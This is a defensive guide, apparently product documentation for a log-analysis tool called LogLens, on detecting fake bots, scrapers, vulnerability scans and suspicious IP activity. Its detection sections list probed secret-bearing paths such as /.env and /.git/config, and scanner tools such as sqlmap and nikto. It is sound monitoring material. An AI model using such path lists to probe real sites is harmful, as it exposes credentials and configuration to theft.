Security & Threat Detection with Server Logs

A practical guide to identifying threats, detecting fake bots, and building an effective security monitoring practice using server log analysis.

The Fake Bot Problem

User-Agent strings are one of the most commonly relied-upon signals for identifying crawlers, but they are trivially spoofed. Any HTTP client can set its User-Agent to anything it wants, and many attackers take advantage of this.

Attackers impersonate Googlebot and other legitimate crawlers for several reasons:

Faster responses — many sites serve pre-rendered or cached content to known bots, giving faster access to page content
Unblocked access — bot-specific allow lists often bypass geo-blocks, paywalls, or login walls
Bypassed rate limits — sites frequently exempt recognised crawlers from rate limiting, allowing aggressive scraping
Evasion of security rules — WAF rules and firewall policies often whitelist known bot User-Agents

Warning

Never trust User-Agent strings alone. Always verify crawler identity by checking the request's source IP against the bot operator's officially published IP ranges. LogLens does this verification automatically for all major crawlers.

Identifying Content Scrapers

Content scrapers have distinctive patterns in server logs that set them apart from legitimate users and crawlers. Once you know what to look for, they become straightforward to spot.

Rapid sequential requests

Scrapers typically make dozens or hundreds of requests per minute from a single IP or a small cluster of IPs. Legitimate users rarely exceed a few pages per minute, and even aggressive crawlers like Googlebot respect crawl-delay directives.

No asset loading

Scrapers request HTML pages only. They do not load CSS, JavaScript, images, fonts, or any other assets that a real browser would need to render the page. If you see an IP fetching page after page with zero corresponding asset requests, it is almost certainly a scraper.

Systematic URL traversal

Look for request patterns that follow a predictable structure: alphabetical ordering, paginated sequences (/page/1, /page/2, /page/3...), or the exact order URLs appear in your sitemap. Human browsing is inherently irregular; machine traversal is not.

Missing referrer and cookie data

Scrapers rarely send referrer headers or manage cookies. A stream of requests with empty Referer headers and no cookies, combined with the patterns above, is a strong signal.

Cloud provider IP addresses

Most scrapers run on cloud infrastructure. Requests originating from AWS, Google Cloud Platform, or Microsoft Azure IP ranges — especially when combined with the patterns above — are highly likely to be automated scraping.

Tip

LogLens automatically flags IPs that exhibit scraping patterns. Use the IP Analysis page to filter by cloud provider ASN and cross-reference with request rates for fast identification.

Vulnerability Scanning Patterns

Automated vulnerability scanners probe for common weaknesses by requesting paths associated with known exploits, exposed configuration files, and popular admin interfaces. These paths should never appear in legitimate traffic.

Watch for request surges to sensitive paths

/wp-login.php
/wp-admin/
/.env
/config.yml
/.git/config
/api/v1/users
/graphql
/swagger.json
/api-docs

Key insight

A surge of 404 responses to sensitive paths is one of the clearest indicators of automated vulnerability scanning. These requests typically arrive in bursts — tens or hundreds within a few minutes — and often originate from a single IP or a small set of rotating IPs.

Suspicious IP Pattern Detection

Beyond specific attack signatures, certain IP-level patterns warrant immediate investigation.

Volume anomalies

A single IP making 1,000 or more requests per hour is abnormal for almost any website. Legitimate users rarely exceed a few hundred page views in a session, even on high-engagement sites.

Rotating IPs from the same subnet

Sophisticated attackers rotate through IP addresses within the same /24 or /16 subnet to avoid per-IP rate limits. When you see multiple IPs from the same block all making elevated requests, treat them as a single actor.

Traffic from unexpected regions

If your site primarily serves users in North America and Europe, a sudden spike of requests from a region where you have no audience is worth investigating — especially if paired with other suspicious signals.

Unusual timing patterns

Requests arriving between 2:00 AM and 5:00 AM local time with User-Agent strings that claim to be mainstream browsers (Chrome, Firefox, Safari) are suspicious. Real users are largely asleep; automated tools are not.

Tip

Use LogLens IP Analysis to sort by request volume and filter by time of day. Combine with geographic filters to quickly surface the patterns described above.

Setting Up Effective Alerts

Detection is only useful if it surfaces threats quickly enough to act on them. LogLens ships five security-relevant alerts that cover the patterns above; all are enabled by default.

Automated Hacking Probe

Looks for the exact patterns described in Vulnerability Scanning Patterns: requests to known-vulnerable paths (/.env, /wp-config.php, /.git/config, etc.), known scanner user-agents (sqlmap, nuclei, nikto, gobuster), and attack signatures in URLs (SQL injection, path traversal, XSS, Log4Shell, command injection). One alert is fired per source IP per six-hour cooldown window so a single sustained scan doesn’t produce hundreds of emails.

The alert is automatically promoted to critical when any probe gets a 200 or 30x response — that means the targeted resource may exist on your origin and you should audit immediately.

Exposed Secret in URL

Scans your URLs daily for tokens, API keys, JWTs, AWS access keys, Stripe live keys, and similar high-precision patterns. Anything found is reported with the secret value redacted (since you already have the original in your logs — the alert email shouldn’t duplicate the leak). Treat any finding as compromised: rotate the value first, then patch the source (form GET vs. POST, leaky webhook handshake, env var rendered client-side).

Massive Traffic Spike

Fires when traffic surges far above your baseline. The alert email lists the top-hit URLs — concentrated on a few content paths usually means viral or press traffic; concentrated on attack endpoints (/login, /search, /api/...) usually means DDoS or aggressive scraping.

Bot Impersonation Surge

Fires when a spike of bots claim to be Googlebot/Bingbot/etc. but originate from IPs that don’t belong to those crawlers. This is the bread-and-butter signal for scrapers forging UAs to bypass robots.txt.

Server Error Spike (5xx)

An attack that’s actually impacting availability will show up here even before the traffic alert fires — an origin straining under scraping or a fuzzer triggering unhandled errors will push the 5xx rate up sharply.

Tuning advice

The defaults are set conservatively to minimise false positives. If you want earlier detection on a specific category, raise the check frequency for that alert in Alerts › Settings rather than lowering the trigger threshold — tighter thresholds usually create more noise than signal.

Response Strategies

Different threat types call for different responses. Acting quickly with the right approach prevents damage while avoiding collateral impact on legitimate traffic.

Threat	Recommended Response	Details
Fake bots	Block at CDN/edge	Use Cloudflare WAF rules or AWS WAF to block IPs that claim a bot User-Agent but fail IP verification
Content scrapers	Rate limit	Enforce 60 requests per minute for unverified clients; tighten further for repeat offenders
Vulnerability scanners	Block + alert	Block the source IPs and investigate the specific paths being targeted to confirm no exposure
Credential stuffing	Rate limit + CAPTCHA	Apply strict rate limits to authentication endpoints and require CAPTCHA after failed attempts

Security Review Cadence

Effective security monitoring is a habit, not a one-time setup. Establish a regular review cadence to stay ahead of evolving threats.

Weekly

Review top IPs by request volume and check for new unverified high-volume sources
Check the 404 report for new sensitive paths being probed
Verify that active alerts fired correctly (or confirm no events warranted them)

Monthly

Audit the full bot list — look for new bot User-Agent strings that appeared this month
Review rate-limit and block rules for relevance; remove blocks that are no longer necessary
Check alert thresholds against current traffic levels and adjust if your baseline has shifted

Quarterly

Full security posture review: compare current threat landscape to previous quarter
Update firewall rules and WAF managed rule sets
Review geographic access policies if your audience has shifted
Validate that all sensitive paths return proper responses (not leaked configuration data)

Next guide

Bot Management & AI Crawlers